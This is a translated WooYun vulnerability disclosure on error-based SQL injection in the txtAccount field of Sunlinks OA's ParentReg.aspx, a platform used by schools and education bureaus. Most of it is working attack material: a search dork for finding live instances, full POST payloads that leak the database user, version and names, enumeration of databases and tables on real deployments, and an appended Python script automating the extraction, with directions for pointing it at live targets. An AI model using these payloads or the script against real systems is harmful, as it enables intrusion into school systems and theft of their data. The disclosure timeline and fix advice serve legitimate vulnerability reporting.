
Vulnerability summary

Defect ID: wooyun-2015-0130335

Title: POST-based SQL injection in an education e-teaching office platform

Vendor: Sunlinks

Author: goubuli

Submitted: 2015-08-01 11:53

Fix deadline: 2015-11-01 10:44

Published: 2015-11-01 10:44

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed to a third-party partner (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-08-01: Details sent to the vendor, awaiting the vendor's response
2015-08-03: CNCERT (National Internet Emergency Center) could not yet reach the responsible organisation; details disclosed to the reporting body only
2015-08-06: Details opened to third-party security partners
2015-09-27: Details opened to core white hats and relevant domain experts
2015-10-07: Details opened to regular white hats
2015-10-17: Details opened to intern white hats
2015-11-01: Details disclosed to the public

Brief description:

As titled.
I've taken a liking to manual injection testing, and I like it more and more...

Detailed description:

Sunlinks OA
Official site: http://**.**.**.**
Case study: http://**.**.**.**/custom-hong.html
The vendor claims around a hundred education-bureau customers, two thousand primary and secondary schools, and a hundred kindergartens.
Vulnerable file: ParentReg.aspx
The txtAccount parameter is injectable via POST.


First, check WooYun for a duplicate:

(screenshot: 0729_13.png)


No duplicate, so gather some live instances and keep digging.
Google keyword:

Sunlinks OA


(screenshot: 0729_2.png)


There are a great many instances; a random sample:

http://**.**.**.**:8080/ParentReg.aspx
http://**.**.**.**:8080/ParentReg.aspx
http://**.**.**.**:8080/ParentReg.aspx
http://**.**.**.**:8080/ParentReg.aspx
**.**.**.**:8080/ParentReg.aspx
http://**.**.**.**:8080/ParentReg.aspx
http://**.**.**.**:8080/ParentReg.aspx
**.**.**.**:8080/ParentReg.aspx
http://**.**.**.**:81/ParentReg.aspx
http://**.**.**.**/ParentReg.aspx
**.**.**.**:8080/ParentReg.aspx
**.**.**.**:8080/ParentReg.aspx
http://**.**.**.**/ParentReg.aspx
....


Too many instances to list them all.
Demo 1:

http://**.**.**.**:8080/ParentReg.aspx


Submit as txtAccount (the quote closes the string literal, 1=user forces SQL Server to convert the nvarchar login name to int, and the resulting conversion error echoes the value; the trailing -- comments out the rest of the query):

S0001%27and%2B1=user--


(screenshot: 0729_10.png)


Demo 2:

http://**.**.**.**:8080/ParentReg.aspx


Submit:

S0001%27and%2B1=user--


(screenshot: 0729_11.png)

Submit:

S0001%27and+1=@@version--

(screenshot: 0729_12.png)


Demo 3:

http://**.**.**.**:8080/ParentReg.aspx


Submit (full URL-encoded POST body; the __VIEWSTATE value is the one the page served):

__SCROLLPOS_TOP=0&__SCROLLPOS_LEFT=0&__EVENTTARGET=lkbLink&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTkyMjUyMjQ3Mw9kFgICAQ9kFgpmDxYCHglpbm5lcmh0bWwFG%2Ba1juWNl%2BW4guWkqeahpeWMuuaVmeiCsuWxgGQCAQ8WAh8ABRtodHRwOi8vd3d3LnRxankuY29tLmNuOjgwODBkAgQPEBYGHg1EYXRhVGV4dEZpZWxkBQRuYW1lHg5EYXRhVmFsdWVGaWVsZAUEY29kZR4LXyFEYXRhQm91bmRnEBUSBuellueItgbnpZbmr40G54i25LqyBuavjeS6sgbkuIjlpKsG5aa75a2QBuWEv%2BWtkAblpbPlhL8G5a2Z5a2QBuWtmeWlswblsrPniLYG5bKz5q%2BNBuWFrOWFrAblqYblqYYG5ZOl5ZOlBuWnkOWnkAblvJ%2FlvJ8G5aa55aa5FRICMDECMDMCMDUCMDcCMDkCMTECMTMCMTUCMTcCMTkCMjECMjMCMjUCMjcCMjkCMzECMzMCMzUUKwMSZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCBw8WAh8ABXM8SU1HIGhlaWdodD0nMTYnIHNyYz0nVUlSZXNvdXJjZS9pbWFnZXMvc3pqeV9sb2dpbl9sb2dvLmdpZicgd2lkdGg9JzE2JyBhbGlnbj0nYWJzTWlkZGxlJz4gJm5ic3A7Jm5ic3A75Yqe5YWs5bmz5Y%2BwZAIIDxYCHwAFHFN1bmxpbmtzIE9BIC5ORVQgdmVyc2lvbiAxLjBkZM96KxDChA1OHGhrIHk7P75G64gO&txtAccount=S0001%27and+1=@@version--&txtPass=dasdf&cmbRelation=01&__VIEWSTATEGENERATOR=4FED9A00


(screenshot: 0729_14.png)


Demo 4:

http://**.**.**.**:8080/ParentReg.aspx


Submit (full URL-encoded POST body):

__SCROLLPOS_TOP=0&__SCROLLPOS_LEFT=0&__EVENTTARGET=lkbLink&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTkyMjUyMjQ3Mw9kFgICAQ9kFgpmDxYCHglpbm5lcmh0bWwFGOa1juWNl%2BmVv%2Ba4heWunumqjOWwj%2BWtpmQCAQ8WAh8ABRlodHRwOi8vd3d3LmNxc3l4eC5jbjo4MDgwZAIEDxAWBh4NRGF0YVRleHRGaWVsZAUEbmFtZR4ORGF0YVZhbHVlRmllbGQFBGNvZGUeC18hRGF0YUJvdW5kZxAVEgbnpZbniLYG56WW5q%2BNBueItuS6sgbmr43kurIG5LiI5aSrBuWmu%2BWtkAblhL%2FlrZAG5aWz5YS%2FBuWtmeWtkAblrZnlpbMG5bKz54i2BuWys%2BavjQblhazlhawG5amG5amGBuWTpeWTpQblp5Dlp5AG5byf5byfBuWmueWmuRUSAjAxAjAzAjA1AjA3AjA5AjExAjEzAjE1AjE3AjE5AjIxAjIzAjI1AjI3AjI5AjMxAjMzAjM1FCsDEmdnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAgcPFgIfAAVzPElNRyBoZWlnaHQ9JzE2JyBzcmM9J1VJUmVzb3VyY2UvaW1hZ2VzL3N6anlfbG9naW5fbG9nby5naWYnIHdpZHRoPScxNicgYWxpZ249J2Fic01pZGRsZSc%2BICZuYnNwOyZuYnNwO%2BWKnuWFrOW5s%2BWPsGQCCA8WAh8ABRxTdW5saW5rcyBPQSAuTkVUIHZlcnNpb24gMS4wZGS3rTglxEHhgBSr6HNV9inuN0dPFQ%3D%3D&txtAccount=S0001%27and+1=@@version--&txtPass=a&cmbRelation=01


(screenshot: 0729_15.png)


Demo 5:

http://**.**.**.**:8080/ParentReg.aspx


Submit (full URL-encoded POST body; this one leaks the current database via db_name()):

__SCROLLPOS_TOP=0&__SCROLLPOS_LEFT=0&__EVENTTARGET=lkbLink&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTkyMjUyMjQ3Mw9kFgICAQ9kFgpmDxYCHglpbm5lcmh0bWwFGOWVhuays%2BWOv%2BaVmeiCsuS9k%2BiCsuWxgGQCAQ8WAh8ABRtodHRwOi8vd3d3LnNkc2hlZHUuY29tOjgwODBkAgQPEBYGHg1EYXRhVGV4dEZpZWxkBQRuYW1lHg5EYXRhVmFsdWVGaWVsZAUEY29kZR4LXyFEYXRhQm91bmRnEBURBuellueItgbnpZbmr40G54i25LqyBuavjeS6sgbkuIjlpKsG5aa75a2QBuWEv%2BWtkAblpbPlhL8G5a2Z5a2QBuWtmeWlswblsrPniLYG5bKz5q%2BNBuWFrOWFrAblqYblqYYG5ZOl5ZOlBuWnkOWnkAblvJ%2FlvJ8VEQIwMQIwMwIwNQIwNwIwOQIxMQIxMwIxNQIxNwIxOQIyMQIyMwIyNQIyNwIyOQIzMQIzMxQrAxFnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAgcPFgIfAAVzPElNRyBoZWlnaHQ9JzE2JyBzcmM9J1VJUmVzb3VyY2UvaW1hZ2VzL3N6anlfbG9naW5fbG9nby5naWYnIHdpZHRoPScxNicgYWxpZ249J2Fic01pZGRsZSc%2BICZuYnNwOyZuYnNwO%2BWKnuWFrOW5s%2BWPsGQCCA8WAh8ABRxTdW5saW5rcyBPQSAuTkVUIHZlcnNpb24gMS4wZGSR8y1qytl7IYiq1r0AfncKlRFBJOUsd0T2zAphgD2JIA%3D%3D&txtAccount=S0001%27and+1=db_name()--&txtPass=1&cmbRelation=01


(screenshot: 0729_16.png)


Database and table information is in the proof section below.

Proof of vulnerability:

Pick any one instance; below we dump the databases.
URL: http://**.**.**.**:8080/ParentReg.aspx
1. Find out how many databases there are. Trick: in error-based injection a numeric result has to be turned into a string first, because an integer compares with 1 without error, whereas a string fails the implicit int conversion and is echoed in the error message. I use the STR function for that here; its exact usage is not covered.
Submit:

__SCROLLPOS_TOP=0&__SCROLLPOS_LEFT=0&__EVENTTARGET=lkbLink&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTkyMjUyMjQ3Mw9kFgICAQ9kFgpmDxYCHglpbm5lcmh0bWwFG%2BW%2Bt%2BW3nuW4guW%2Bt%2BWfjuWMuuaVmeiCsuWxgGQCAQ8WAh8ABRxodHRwOi8vd3d3LmRjZWR1Lmdvdi5jbjo4MDgwZAIEDxAWBh4NRGF0YVRleHRGaWVsZAUEbmFtZR4ORGF0YVZhbHVlRmllbGQFBGNvZGUeC18hRGF0YUJvdW5kZxAVBAbniLbkurIG5q%2BN5LqyBueIt%2BeItwblpbblpbYVBAIwMQIwMwIwNQIwNxQrAwRnZ2dnZGQCBw8WAh8ABXM8SU1HIGhlaWdodD0nMTYnIHNyYz0nVUlSZXNvdXJjZS9pbWFnZXMvc3pqeV9sb2dpbl9sb2dvLmdpZicgd2lkdGg9JzE2JyBhbGlnbj0nYWJzTWlkZGxlJz4gJm5ic3A7Jm5ic3A75Yqe5YWs5bmz5Y%2BwZAIIDxYCHwAFHFN1bmxpbmtzIE9BIC5ORVQgdmVyc2lvbiAxLjBkZIVNU6ml7e52DM6Fb2AL9ERBbZfu&txtAccount=S0001%27and+1=STR((SELECT count(*) FROM Master..SysDatabases),6,1)--&txtPass=aaa&cmbRelation=01


(screenshot: 0729_17.png)


Six databases in total.
The current database can be obtained via db_name(); the error reads:

Conversion failed when converting the nvarchar value 'OA' to data type int. (SQL Server's Chinese-localized message: 在将 nvarchar 值 'OA' 转换成数据类型 int 时失败。)


(screenshot: 0729_18.png)


2. Dump all database names
Use db_name(xxid) with xxid from 1 to 6.
The result is:

master
tempdb
model
msdb
dcDnn.WebShow.2k
OA


3. Enumerate the tables
First find out how many tables there are, using the same method as above.
Submit:

__SCROLLPOS_TOP=0&__SCROLLPOS_LEFT=0&__EVENTTARGET=lkbLink&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTkyMjUyMjQ3Mw9kFgICAQ9kFgpmDxYCHglpbm5lcmh0bWwFG%2BW%2Bt%2BW3nuW4guW%2Bt%2BWfjuWMuuaVmeiCsuWxgGQCAQ8WAh8ABRxodHRwOi8vd3d3LmRjZWR1Lmdvdi5jbjo4MDgwZAIEDxAWBh4NRGF0YVRleHRGaWVsZAUEbmFtZR4ORGF0YVZhbHVlRmllbGQFBGNvZGUeC18hRGF0YUJvdW5kZxAVBAbniLbkurIG5q%2BN5LqyBueIt%2BeItwblpbblpbYVBAIwMQIwMwIwNQIwNxQrAwRnZ2dnZGQCBw8WAh8ABXM8SU1HIGhlaWdodD0nMTYnIHNyYz0nVUlSZXNvdXJjZS9pbWFnZXMvc3pqeV9sb2dpbl9sb2dvLmdpZicgd2lkdGg9JzE2JyBhbGlnbj0nYWJzTWlkZGxlJz4gJm5ic3A7Jm5ic3A75Yqe5YWs5bmz5Y%2BwZAIIDxYCHwAFHFN1bmxpbmtzIE9BIC5ORVQgdmVyc2lvbiAxLjBkZIVNU6ml7e52DM6Fb2AL9ERBbZfu&txtAccount=S0001%27and+1=STR((select count(*) from information_schema.tables),6,1)--&txtPass=aaa&cmbRelation=01


(screenshot: 0729_19.png)


345 tables, too many to enumerate one by one...
Here are the first 20:

Greeting
php_sort_ddzd
Meeting
SubjectMatterType
AssessItems
php_sort_zwgk
GreetingContent
MeetingAddress
Code_JiBie
GreetingGarbage
ClassManager
php_sort_minb
GreetingMaster
ClassMsgBoard
php_sort_ddwx
Duty
AssessList
php_sort_gksx
GreetingReader
DutyEngage
...
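As an added example (not from the original report, the vendor, or WooYun), the following Python script captures the error-based extraction logic behind Demos 1 to 5 and steps 1 to 3 above so it can be run offline: it builds the S0001' and 1=<expr>-- payload for txtAccount, parses the leaked value out of SQL Server error 245 in both the English and the Chinese localisation quoted above, wraps numeric results in STR() so they leak too, and walks db_name(dbid) to list the databases. It goes slightly beyond the report in one respect: it leaks max(dbid) rather than count(*), because database IDs can have gaps after a database is dropped. The fake_vulnerable_server function, its responses and the SAMPLE_DBS mapping are constructed stand-ins for the real ParentReg.aspx POST (the names mirror those the report lists); the field layout in build_form_body follows the POST bodies shown in Demos 3 to 5.

```python
import re
from typing import Callable, Dict, List, Optional
from urllib.parse import urlencode

# The txtAccount value closes the string literal in the original query, appends
# a predicate comparing the integer 1 with an nvarchar expression, and comments
# out the remainder. SQL Server tries to convert the nvarchar to int, fails,
# and echoes the offending value in error 245.
def build_payload(expr: str, account: str = "S0001") -> str:
    return f"{account}' and 1={expr}--"


def build_form_body(expr: str, viewstate: str) -> str:
    """URL-encoded body of the ParentReg.aspx POST. ASP.NET WebForms rejects a
    postback without a valid __VIEWSTATE, so it must be the value the server
    last served (the report's samples carry real ones)."""
    fields = {
        "__EVENTTARGET": "lkbLink",
        "__EVENTARGUMENT": "",
        "__VIEWSTATE": viewstate,
        "txtAccount": build_payload(expr),
        "txtPass": "x",
        "cmbRelation": "01",
    }
    return urlencode(fields)


# Error 245 as rendered by an English and by a Simplified-Chinese SQL Server.
_LEAK_PATTERNS = [
    re.compile(r"Conversion failed when converting the n?varchar value '(.*?)' to data type int", re.S),
    re.compile(r"在将 n?varchar 值 '(.*?)' 转换成数据类型 int 时失败", re.S),
]


def parse_leak(response_text: str) -> Optional[str]:
    """Return the value quoted in a conversion error, or None if the response
    carried no such error (invalid expression, or a NULL result)."""
    for pattern in _LEAK_PATTERNS:
        match = pattern.search(response_text)
        if match:
            return match.group(1)
    return None


def count_expr(subquery: str) -> str:
    # An integer would compare with 1 without error, so STR() turns it into a
    # right-justified string such as '   6.0' that fails the int conversion.
    return f"STR(({subquery}),6,1)"


Sender = Callable[[str], str]  # injected expression -> full HTTP response text


def leak_int(send: Sender, subquery: str) -> int:
    raw = parse_leak(send(count_expr(subquery)))
    if raw is None:
        raise RuntimeError("response contained no conversion error")
    return int(float(raw))


def enumerate_databases(send: Sender) -> List[str]:
    """List databases by dbid. The report loops db_name(1..count); leaking
    max(dbid) instead survives gaps left by dropped databases."""
    highest = leak_int(send, "SELECT max(dbid) FROM master..sysdatabases")
    names: List[str] = []
    for dbid in range(1, highest + 1):
        name = parse_leak(send(f"db_name({dbid})"))
        if name is not None:  # db_name(gap) is NULL, and 1=NULL raises no error
            names.append(name)
    return names


# --- constructed stand-in for the vulnerable endpoint (no network needed) ---
SAMPLE_DBS: Dict[int, str] = {
    1: "master", 2: "tempdb", 3: "model", 4: "msdb",
    5: "dcDnn.WebShow.2k", 6: "OA",
}


def fake_vulnerable_server(expr: str) -> str:
    """Mimics the ASP.NET error page a SQL Server backend would return for the
    handful of expressions this demo sends; every response here is constructed."""
    results = {
        "user": "dbo",
        "db_name()": "OA",
        count_expr("SELECT max(dbid) FROM master..sysdatabases"): "   6.0",
    }
    for dbid, name in SAMPLE_DBS.items():
        results[f"db_name({dbid})"] = name
    if expr not in results:
        return "<html>Server Error in '/' Application.</html>"
    return (f"<html>Conversion failed when converting the nvarchar value "
            f"'{results[expr]}' to data type int.</html>")


if __name__ == "__main__":
    print("current user:", parse_leak(fake_vulnerable_server("user")))
    print("databases:", enumerate_databases(fake_vulnerable_server))
```

Against a live target the Sender would POST build_form_body(expr, viewstate) to ParentReg.aspx and return the response body; the __VIEWSTATE must be fetched fresh from a GET of the page first. parse_leak returning None on every request means the application is not echoing database errors, in which case this error-based approach does not apply and a blind (boolean or time-based) technique would be needed instead.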

Suggested fix:

Filter the input. (The robust fix is to pass txtAccount to a parameterized query, e.g. via SqlParameter in ADO.NET, rather than concatenating it into the SQL string; filtering alone is easy to bypass.)

Copyright notice: please credit goubuli@WooYun when reposting


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2015-08-03 10:43

Vendor reply:

CNVD confirmed and reproduced the reported issue and has notified the software vendor (or site operator) by e-mail (and telephone) through its public contact channels; the vendor will provide a fix. The related cases have also been passed to the corresponding CNCERT branch centre, which will coordinate handling with the site operators.

Latest status:

None yet